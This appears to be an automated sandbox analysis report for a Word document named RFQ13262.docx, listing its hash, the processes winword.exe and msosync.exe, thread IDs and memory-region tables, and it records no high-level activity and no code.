4ef2c020a2f45b6891a9094d5a042472417657961c05358f67ef58e7e8f9d4c4 (SHA256)
RFQ13262.docx
Word Document
Created at 2018-11-27 09:36:00
Notifications (2/3)
The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
0
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:24, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:38, Reason: Self Terminated |
| Monitor Duration | 00:03:14 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8ec |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
984
0x
978
0x
970
0x
968
0x
958
0x
954
0x
950
0x
94C
0x
948
0x
944
0x
940
0x
93C
0x
938
0x
934
0x
930
0x
92C
0x
928
0x
908
0x
904
0x
900
0x
8F8
0x
8F4
0x
8F0
0x
9C8
0x
9CC
0x
9D0
0x
9D4
0x
9D8
0x
9DC
0x
9E0
0x
9F4
0x
B24
0x
B28
0x
B2C
0x
B78
0x
B90
0x
9A4
0x
69C
0x
334
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00152fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0017ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00182fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00192fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00797fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x00920fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x01d2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01d30000 | 0x01ffefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002000000 | 0x02000000 | 0x023f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002400000 | 0x02400000 | 0x0243ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002460000 | 0x02460000 | 0x02460fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002470000 | 0x02470000 | 0x02470fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002480000 | 0x02480000 | 0x024fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002530000 | 0x02530000 | 0x02534fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002540000 | 0x02540000 | 0x02541fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02550000 | 0x0255bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02560000 | 0x02567fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002570000 | 0x02570000 | 0x0257ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002580000 | 0x02580000 | 0x0277ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002780000 | 0x02780000 | 0x0285efff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02860000 | 0x0286ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002870000 | 0x02870000 | 0x02870fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x0297ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02980000 | 0x02a3ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02abffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002ac0000 | 0x02ac0000 | 0x02ac0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002ad0000 | 0x02ad0000 | 0x02ad0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002ae0000 | 0x02ae0000 | 0x02ae0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02b10fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002b20000 | 0x02b20000 | 0x02b21fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x02b30000 | 0x02b30fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02b40000 | 0x02b5ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002b60000 | 0x02b60000 | 0x02c5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c60000 | 0x02c60000 | 0x02c60fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d70000 | 0x02d70000 | 0x02d71fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002d80000 | 0x02d80000 | 0x02d80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002da0000 | 0x02da0000 | 0x02da1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02e30fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e50000 | 0x02e50000 | 0x02ecffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x02ed0000 | 0x02f4efff | Memory Mapped File | r |
|
|
|
- |
| c_1255.nls | 0x02f50000 | 0x02f60fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002fb0000 | 0x02fb0000 | 0x030affff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x030b0000 | 0x0315afff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003190000 | 0x03190000 | 0x0328ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x0338ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003390000 | 0x03390000 | 0x0378ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003790000 | 0x03790000 | 0x0388ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003970000 | 0x03970000 | 0x03a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a70000 | 0x03a70000 | 0x03b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c20000 | 0x03c20000 | 0x03c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c30000 | 0x03c30000 | 0x03d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d50000 | 0x03d50000 | 0x03dcffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000003dd0000 | 0x03dd0000 | 0x041cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004280000 | 0x04280000 | 0x0437ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043b0000 | 0x043b0000 | 0x044affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044c0000 | 0x044c0000 | 0x045bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045c0000 | 0x045c0000 | 0x046bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004800000 | 0x04800000 | 0x04b42fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b50000 | 0x04b50000 | 0x0534ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000005380000 | 0x05380000 | 0x0547ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005480000 | 0x05480000 | 0x054fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005570000 | 0x05570000 | 0x0566ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005740000 | 0x05740000 | 0x0583ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005850000 | 0x05850000 | 0x0585ffff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x05860000 | 0x0618ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006260000 | 0x06260000 | 0x062dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006390000 | 0x06390000 | 0x0648ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000064c0000 | 0x064c0000 | 0x065bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000065e0000 | 0x065e0000 | 0x066dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006740000 | 0x06740000 | 0x0683ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000068b0000 | 0x068b0000 | 0x068bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000068d0000 | 0x068d0000 | 0x069cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006a70000 | 0x06a70000 | 0x06b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006b70000 | 0x06b70000 | 0x0736ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000073f0000 | 0x073f0000 | 0x074effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000074f0000 | 0x074f0000 | 0x084effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000008620000 | 0x08620000 | 0x0869ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008780000 | 0x08780000 | 0x087fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008800000 | 0x08800000 | 0x08bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008c00000 | 0x08c00000 | 0x09000fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009010000 | 0x09010000 | 0x09410fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009420000 | 0x09420000 | 0x09820fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009830000 | 0x09830000 | 0x09a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009a30000 | 0x09a30000 | 0x0aa30fff | Private Memory | rw |
|
|
|
- |
| private_0x000000000aa40000 | 0x0aa40000 | 0x0ae3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037a30000 | 0x37a30000 | 0x37a3ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037c80000 | 0x37c80000 | 0x37c8ffff | Private Memory | rwx |
|
|
|
- |
| osppc.dll | 0x751b0000 | 0x751e2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x77e10000 | 0x77e12fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winword.exe | 0x13fcd0000 | 0x13feabfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007febdd50000 | 0x7febdd50000 | 0x7febdd5ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007febfb90000 | 0x7febfb90000 | 0x7febfb9ffff | Private Memory | rwx |
|
|
|
- |
| ivy.dll | 0x7fee47a0000 | 0x7fee49f4fff | Memory Mapped File | rwx |
|
|
|
- |
| chart.dll | 0x7fee4a00000 | 0x7fee57d5fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x7fee57e0000 | 0x7fee58f9fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x7fee5900000 | 0x7fee5a73fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x7fee5a80000 | 0x7fee5d1afff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee5d20000 | 0x7fee5db8fff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee5dc0000 | 0x7fee5f3dfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee5f40000 | 0x7fee610ffff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fee6110000 | 0x7fee62acfff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee62b0000 | 0x7feea696fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feea6a0000 | 0x7feeb394fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeb3a0000 | 0x7feeb7dcfff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feeb7e0000 | 0x7feed20bfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed210000 | 0x7feedeb6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feedec0000 | 0x7feee98efff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feee990000 | 0x7feef073fff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7feef080000 | 0x7feef522fff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x7feef530000 | 0x7fef04b4fff | Memory Mapped File | rwx |
|
|
|
- |
| wwlib.dll | 0x7fef04c0000 | 0x7fef2c98fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef2d10000 | 0x7fef2d7efff | Memory Mapped File | rwx |
|
|
|
- |
| mlang.dll | 0x7fef3170000 | 0x7fef31aafff | Memory Mapped File | rwx |
|
|
|
- |
| msointl30.dll | 0x7fef3320000 | 0x7fef3330fff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x7fef3340000 | 0x7fef33fffff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7fef3400000 | 0x7fef34e1fff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7fef34f0000 | 0x7fef357afff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 291 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #2: msosync.exe
0
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\program files\microsoft office\root\office16\msosync.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\MsoSync.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:04:30, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:55 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9e4 |
| Parent PID | 0x8ec (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9E8
0x
9F0
0x
A74
0x
A78
0x
A7C
0x
A80
0x
A84
0x
A8C
0x
A90
0x
A94
0x
A98
0x
A9C
0x
AA0
0x
AA4
0x
AA8
0x
AB0
0x
AB8
0x
ABC
0x
AC0
0x
AC4
0x
AC8
0x
ACC
0x
AD0
0x
AD4
0x
ADC
0x
AE0
0x
AE4
0x
AEC
0x
B00
0x
B30
0x
B34
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00051fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00080fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00096fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00230fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00242fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00262fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00272fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00282fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00292fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x006e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00870fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x01c7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01c80000 | 0x01f4efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001f50000 | 0x01f50000 | 0x02342fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002350000 | 0x02350000 | 0x0242efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x0252ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002530000 | 0x02530000 | 0x02534fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x0259ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025c0000 | 0x025c0000 | 0x026bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026c0000 | 0x026c0000 | 0x028bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a60000 | 0x02a60000 | 0x02b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c90000 | 0x02c90000 | 0x02c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d20000 | 0x02d20000 | 0x02e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e90000 | 0x02e90000 | 0x02f8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002f90000 | 0x02f90000 | 0x0338ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003410000 | 0x03410000 | 0x0350ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003590000 | 0x03590000 | 0x0368ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003690000 | 0x03690000 | 0x0378ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037d0000 | 0x037d0000 | 0x038cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003960000 | 0x03960000 | 0x03a5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003a60000 | 0x03a60000 | 0x0425ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000037a30000 | 0x37a30000 | 0x37a3ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037c80000 | 0x37c80000 | 0x37c8ffff | Private Memory | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| msosync.exe | 0x13f780000 | 0x13f807fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000013f810000 | 0x13f810000 | 0x13f810fff | Private Memory | rw |
|
|
|
- |
| private_0x000007febdd50000 | 0x7febdd50000 | 0x7febdd5ffff | Private Memory | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee5dc0000 | 0x7fee5f3dfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee5f40000 | 0x7fee610ffff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fee6110000 | 0x7fee62acfff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee62b0000 | 0x7feea696fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feea6a0000 | 0x7feeb394fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeb3a0000 | 0x7feeb7dcfff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feeb7e0000 | 0x7feed20bfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed210000 | 0x7feedeb6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feedec0000 | 0x7feee98efff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feee990000 | 0x7feef073fff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7feef080000 | 0x7feef522fff | Memory Mapped File | rwx |
|
|
|
- |
| davclnt.dll | 0x7fef31e0000 | 0x7fef31fbfff | Memory Mapped File | rwx |
|
|
|
- |
| msointl30.dll | 0x7fef3320000 | 0x7fef3330fff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7fef3400000 | 0x7fef34e1fff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7fef34f0000 | 0x7fef357afff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7fef3620000 | 0x7fef36e5fff | Memory Mapped File | rwx |
|
|
|
- |
| c2r64.dll | 0x7fef8370000 | 0x7fef8559fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvsubsystems64.dll | 0x7fef8560000 | 0x7fef8799fff | Memory Mapped File | rwx |
|
|
|
- |
| davhlpr.dll | 0x7fef92e0000 | 0x7fef92e9fff | Memory Mapped File | rwx |
|
|
|
- |
| dxgi.dll | 0x7fef9810000 | 0x7fef98b6fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10_1core.dll | 0x7fef98c0000 | 0x7fef9914fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10_1.dll | 0x7fef9920000 | 0x7fef9953fff | Memory Mapped File | rwx |
|
|
|
- |
| office.odf | 0x7fefa530000 | 0x7fefa74cfff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x7fefa750000 | 0x7fefaa65fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-utility-l1-1-0.dll | 0x7fefaa80000 | 0x7fefaa82fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-environment-l1-1-0.dll | 0x7fefaa90000 | 0x7fefaa92fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-filesystem-l1-1-0.dll | 0x7fefaaa0000 | 0x7fefaaa2fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-time-l1-1-0.dll | 0x7fefaab0000 | 0x7fefaab2fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-multibyte-l1-1-0.dll | 0x7fefaac0000 | 0x7fefaac4fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-math-l1-1-0.dll | 0x7fefaad0000 | 0x7fefaad4fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-locale-l1-1-0.dll | 0x7fefaae0000 | 0x7fefaae2fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7fefaaf0000 | 0x7fefab8bfff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-convert-l1-1-0.dll | 0x7fefab90000 | 0x7fefab93fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-stdio-l1-1-0.dll | 0x7fefaba0000 | 0x7fefaba3fff | Memory Mapped File | rwx |
|
|
|
- |
